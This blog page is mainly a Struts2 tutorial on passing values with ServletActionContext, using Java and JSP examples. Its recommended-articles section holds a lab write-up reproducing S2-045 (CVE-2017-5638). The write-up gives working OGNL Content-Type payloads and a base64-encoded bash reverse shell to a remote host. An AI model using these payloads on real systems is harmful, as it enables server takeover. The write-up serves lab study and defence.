struts2前后台传值汇总-(3)ServletActionContext-http格式

最新推荐文章于 2024-12-31 19:30:43 发布
原创 最新推荐文章于 2024-12-31 19:30:43 发布 · 247 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#ServletActionContext

本文介绍如何在Struts2框架中通过ServletActionContext获取request、session及application对象,并利用这些对象设置属性值。同时,展示了如何在前端页面通过EL表达式和控制反转IOC的方式读取这些属性。

后台调用ServletActionContext.getServletContext()获取application,ServletActionContext.getRequest()获取request信息,然后通过request信息获取session信息。和容器绑定可以获取除传值以外的容器其他信息。

package struts.test.action;

import java.sql.SQLException;
import java.util.Map;

import javax.servlet.ServletContext;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpSession;

import org.apache.struts2.ServletActionContext;

import com.opensymphony.xwork2.ActionSupport;

/**
 * 登录练习
 * @author zk
 *
 */
public class LoginAction extends ActionSupport {
	//获取request对象
	HttpServletRequest request1;
	HttpSession session1;
	ServletContext application1;
	
	@Override
	public String execute() throws Exception {
		request1 = ServletActionContext.getRequest();
		session1 = request1.getSession();
		application1 = ServletActionContext.getServletContext();
		
		request1.setAttribute("req", "request1属性");
		session1.setAttribute("ses", "session1属性");
		application1.setAttribute("app", "application1属性");
		
		return SUCCESS;
	}
	

}

 

前台2种方式获取(EL表达式和控制反转IOC)

<%@ page pageEncoding="UTF-8"%>  
<%@ taglib uri="/struts-tags" prefix="s" %>  
<%   
    String path = request.getContextPath();   
%>  
<html>  
<head></head>  
<body>  
    <h1>adminSuc</h1>  
    管理员页面      
    <br/><br/>  
    requset属性接受:<s:property value="#request.req"/> <br/>  
    session属性接受:<s:property value="#session.ses"/><br/>  
    application属性接受:<s:property value="#application.app"/><br/>  
    <br/>  
    =============================   
    <br/>    
    <br/><h1> 另外一种获取方法 :</h1><br/>  
    requset属性接受:${requestScope.req}<br/>  
    session属性接受:${sessionScope.ses}<br/>  
    application属性接受:${applicationScope.app}<br/>  
    <br/>  
    <br/>    
    <a href="<%=path %>/login.jsp">返回</a>  
</body>  
</html>

 

struts2集成struts-ssl-plugin插件实现https访问例子
04-05
Struts2是一个非常流行的Java Web框架,用于构建可维护性和可扩展性良好的企业级应用程序。在Web应用中,为了确保数据输的安全性,通常会使用HTTPS协议,它基于SSL/TLS来加密通信,保护用户的隐私信息。Struts2...
使用struts2框架来实现前台与后台的交互
09-26
使用struts2框架来实现前台与后台的交互
Struts中ActionContext和ServletActionContext的比较
数据库天地
11-12 180
一 ActionContext 在Struts2开发中除了将请求参数自动设置到Action的字段中,往往也需要在Action里直接获取请求(Request)或会话(Session)的一些信息,甚至需要直接对JavaServlet Http的请求(HttpServletRequest)和响应(HttpServletResponse)操作。例如在Action中取得request请求参数"user...
Struts2——前后台总结
lovesman的博客
03-08 1598
进入新公司两个月了,在新公司主要做的是web开发,java后台开发还是比较少的。最近一直在努力学习java-web中。bootstrap、js、jquery,struts2,感觉任重而道远。加油,BOY! 下面让我们进入到这篇博客的正题中。 一、前台给后台 (1)属性驱动 属性驱动是指在Aciton类中定义和HTML页面名称一样的字段,同时设置get和set方法。适合简单,我司代码中几乎...
tinymce 富文本编辑器 java Struts2 从前台到后台数据之间的
白雨青
03-27 875
tinymce 富文本编辑器 java Struts2 从前台到后台数据之间的递 显示在前台 生成环境具体使用
Struts2前台向后台方法
evilcry2012的专栏
07-07 642
Struts2前台向后台方法 struts2中的Action接收表单递过来的参数有3种方法: 如,登陆表单login.jsp:   用户名:    密码:               提交"/>     1.在Action类中定义表单属性,两者属性名称必须一致。提供setter,getter方法。即可接收到表单过来的参数. 这种接收参数的方法,方便简单,但是结构性不是
Struts2 漏洞复现之s2-045
weixin_51220765的博客
12-14 3168
Struts2 漏洞复现之s2-045 原理: 在使用基于Jakarta插件的文件上功能时,有可能存在远程命令执行,导致系统被黑客入侵。恶意用户可在上文件时通过修改HTTP请求头中的Content-Type来触发该漏洞,进而执行系统命令。 影响版本: Struts 2.3.5 - Struts 2.3.31 Struts 2.5 - Struts 2.5.10 1.进入045 cd vulhub-master/struts2/s2-045 2.开启045 docker-compose up -d
vulfocus靶场struts2 命令执行 CVE-2016-3081
没有故事
04-23 697
后面接payload。Struts 2服务器上执行任意代码,取得网站服务器控制权。payload: 红色部分为可替换的执行命令。远程攻击者利用漏洞可。
[旧文系列] Struts2历史高危漏洞系列-part2:S2-007/S2-008/S2-009
mole_exp的博客
01-18 2417
文章目录关于<旧文系列>前言S2-007漏洞复现与分析可回显PoC漏洞修复S2-008漏洞复现与分析Vuln-1:Remote command execution in CookieInterceptorVuln-2:Remote command execution in DebuggingInterceptorVuln-2:可回显PoC漏洞修复S2-009漏洞复现与分析可回显PoC漏洞修复Reference 关于<旧文系列> <旧文系列>系列是笔者将以前发到其他地方的技
漏洞分析 | Apache Struts文件上漏洞(CVE-2024-53677)
WangsuSecurity的博客
12-31 2843
目前该漏洞POC状态已在互联网公开,网宿评分:高危,CVSS 3.0 评分:8.1
struts2前台递List、Set、Map集合数据到后台
凌晨1点21分的专栏
04-15 1万+
struts2前台递List、Set、Map集合数据到后台          对应数据在前台与后天中的交互,struts2框架替我们做了很大部分的数据封装工作,这里就关于一些常见类型数据递的格式和配置注意事项做简单的记录。          主要有简单类,List集合,Set集合,Map集合数据的在前台与后天间的递与展示 数据准备:基础类Student.class package c
Struts2从后台递数据到前台的主要方法和流程
zw19861028的专栏
10-05 468
两种主要方式: 一 和Servlet API耦合的访问方式 二 和Servlet API解耦的访问方式 ******************************************************************** 一 和Servlet API耦合的访问方式 1、 采用Request (HttpServletRequest)对象来递数据 (1)在Act...
Struts2前后台参数递总结
李黎敏 ——为优秀j2ee架构师而努力
01-05 3731
最近的项目需要使用Struts2,一些细节记不清了,这里转载一篇博客,顺便回顾一下。 Struts2从后台递数据到前台的主要方法和流程 两种主要方式: 一 和Servlet API耦合的访问方式 二 和Servlet API解耦的访问方式 ****************************************************************
Struts2中jsp前台到action后台的方法
热门推荐
Damon_tong 专栏
02-28 2万+
struts2中的Action接收表单递过来的参数有3种方法: 如,登陆表单login.jsp:   用户名:    密 码:                   1.在Action类中定义表单属性,两者属性名称必须一致。提供setter,getter方法。即可接收到表单过来的参数. 这种接收参数的方法,方便简单,但是结构性不是很好,且当表单递来的参数很多的时候,整个
Struts2前后台参数
qq_36677358的博客
11-13 904
前端向后台递参数 在后台获取前端递的参数时,一定要创建get(),set()方法,使用对象驱动时还要保证存在无参构造 1.属性驱动获得参数 通过在Action类中创建与前端页面中name相同的属性,并创建get()与set()方法,同时还可以自动转换数据类型,但是只支持8大基本数据类型以及包装类的转换. 在下面代码中user与pwd都能获取到 private String us...
struts2后台递数据到前台和前台得到数据
xclsky的博客
03-06 2250
struts2后台递数据到前台,前台得到数据。 后台通过request来递数据到前台 String crmSystemUrl="www.baidu.com"; ServletActionContext.getRequest().setAttribute("crmSystemUrl",crmSystemUrl ); 前台得到: 前台js得到:var crm_system
Struts2后端向前端
dreamVShardwork的博客
05-05 3727
 由于在Action中并不能直接诶访问Servlet API,但它提供了相关类ActionContext来访问HttpServletRequest、HttpSession和ServletContext,所以在向前端页面的方法就出现了多样化。一般我们经常使用的就是通过request、session来,至于Application范围这一级别的基本上用的少。 1. 首先如果变量是Acti
Struts2 漏洞(S2-045/CVE-2017-5638)复现
最新发布
10-31
<think>我们参考提供的引用内容,特别是引用[4]和引用[5]来回答用户的问题。用户明确要求复现S2-045漏洞(CVE-2017-5638)。 根据引用[4]:该漏洞影响范围是使用基于Jakarta插件的文件上功能时,通过修改HTTP请求头中的Content-Type来触发漏洞。 引用[5]给出了具体的利用代码,是一个OGNL表达式,用于执行系统命令(例如反弹shell)。 复现步骤: 1. 环境搭建:使用vulhub提供的环境,进入s2-045目录,启动环境。 2. 构造恶意请求:利用curl或其他工具发送一个HTTP请求,在Content-Type头中插入恶意的OGNL表达式。 3. 执行命令:OGNL表达式会执行任意系统命令,如计算233*233(用于验证)或者反弹shell。 具体步骤: 步骤1:搭建漏洞环境 - 假设已经安装好docker和vulhub漏洞库。 - 进入对应目录:`cd vulhub/struts2/s2-045` - 启动环境:`docker-compose up -d` 步骤2:验证漏洞存在(以执行计算233*233为例) - 构造恶意请求,将以下命令中的URL替换为实际目标URL(通常是8080端口) - 命令示例: ```bash curl -v -X POST http://目标IP:8080/ -H "Content-Type: %{(#nike=&#39;multipart/form-data&#39;).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[&#39;com.opensymphony.xwork2.ActionContext.container&#39;]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(#ros.println(233*233))}" ``` - 如果漏洞存在,返回的响应中会包含233*233的计算结果(54289)。 步骤3:执行反弹shell(可选) - 需要将OGNL表达式中的命令替换为反弹shell的命令,并替换IP和端口。 - 注意:OGNL表达式中的特殊字符需要进行适当编码(如引号、重定向符号等)。 - 引用[5]中给出了一个反弹shell的OGNL表达式示例,但注意该示例中使用了`bash -i>&/dev/tcp/ip/port 0>&1`,需要将`ip`和`port`替换为攻击机的IP和监听端口。 - 示例代码(注意:实际使用需要将单引号内的命令替换,并确保整个表达式正确): ```bash %{(#nike=&#39;multipart/form-data&#39;).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[&#39;com.opensymphony.xwork2.ActionContext.container&#39;]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=&#39;bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyLjEvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}&#39;).(#iswin=(@java.lang.System@getProperty(&#39;os.name&#39;).toLowerCase().contains(&#39;win&#39;))).(#cmds=(#iswin?{&#39;cmd.exe&#39;,&#39;/c&#39;,#cmd}:{&#39;/bin/bash&#39;,&#39;-c&#39;,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} ``` - 上面的反弹shell命令采用了base64编码(编码内容为`bash -i >& /dev/tcp/192.168.12.1/9999 0>&1`),以避免特殊字符问题。实际使用时需要将IP和端口替换成攻击机的IP和端口,并重新编码(注意:base64编码后替换示例中的`YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyLjEvOTk5OSAwPiYx`)。 步骤4:在攻击机上开启监听 - 使用nc命令监听端口:`nc -lvp 9999` 步骤5:发送恶意请求 - 将构造好的恶意Content-Type头放入POST请求中发送到目标。 注意事项: 1. 复现环境为实验环境,请勿用于非法用途。 2. 复现完成后,关闭环境:`docker-compose down` 引用说明: [^4] 提供了漏洞描述和环境搭建方法。 [^5] 提供了具体的利用代码。 根据以上步骤,我们可以完成S2-045漏洞的复现。 </think>### Struts2 漏洞复现(S2-045/CVE-2017-5638) 根据引用内容和漏洞复现最佳实践,步骤如下: #### 一、漏洞原理 该漏洞源于Jakarta文件上插件的异常处理机制。当攻击者**恶意构造`Content-Type`请求头**时,Struts2会错误执行其中的OGNL表达式,导致远程代码执行(RCE)[^4][^5]。影响范围: - Struts 2.3.5 - 2.3.31 - Struts 2.5 - 2.5.10 #### 二、复现步骤 1. **环境搭建** 使用Vulhub靶场(需提前安装Docker): ```bash cd vulhub/struts2/s2-045 # 进入漏洞目录 docker-compose up -d # 启动环境 docker ps # 确认容器运行(默认端口8080) ``` 2. **验证漏洞存在性** 执行测试命令(计算`233*233`): ```bash curl -v -X POST http://目标IP:8080/ \ -H "Content-Type: %{(#nike=&#39;multipart/form-data&#39;).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(#ros.println(233*233))}" ``` **预期结果**:响应中包含`54289`(即$233^2$的计算结果)[^5]。 3. **获取反向Shell(关键步骤)** 修改OGNL表达式执行反弹Shell: ```bash # 替换以下内容: # <ATTACKER_IP> = 攻击机IP # <PORT> = 监听端口 PAYLOAD=&#39;%{(#nike="multipart/form-data").(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context["com.opensymphony.xwork2.ActionContext.container"]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd="bash -c {echo,<BASE64_ENCODED_COMMAND>}|{base64,-d}|{bash,-i}").(#p=new java.lang.ProcessBuilder(#cmd)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))}&#39; # 生成Base64编码的反弹Shell命令(示例): SHELL_CMD="bash -i >& /dev/tcp/<ATTACKER_IP>/<PORT> 0>&1" ENCODED_CMD=$(echo "$SHELL_CMD" | base64 | tr -d &#39;\n&#39;) # 发送Payload curl -v -X POST http://目标IP:8080/ -H "Content-Type: $PAYLOAD" ``` **说明**:需提前在攻击机用`nc -lvp <PORT>`监听端口[^5]。 #### 三、防御建议 1. 升级到Struts 2.3.322.5.10.1+ 2. 禁用Jakarta文件上插件 3. 在WAF中过滤异常`Content-Type`头(如包含`#`、`{`等符号) #### 复现注意事项 - 实验环境需隔离,避免影响真实系统 - Vulhub环境复现后关闭容器:`docker-compose down` - 反向Shell命令需根据目标系统调整(Windows/Linux) --- ### 相关问题 1. Struts2其他高危漏洞(如S2-005、S2-046)的利用原理有何异同? 2. 如何通过流量特征检测Struts2 OGNL注入攻击? 3. 除文件上外,Struts2还有哪些常见攻击面? [^1]: vulhub漏洞复现篇:s2-046 [^2]: vulhub漏洞复现篇:S2-005 [^3]: Struts2(s2-045)漏洞分析 [^4]: vulhub漏洞复现篇:s2-045 [^5]: vulhub-Struts2-045漏洞复现
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值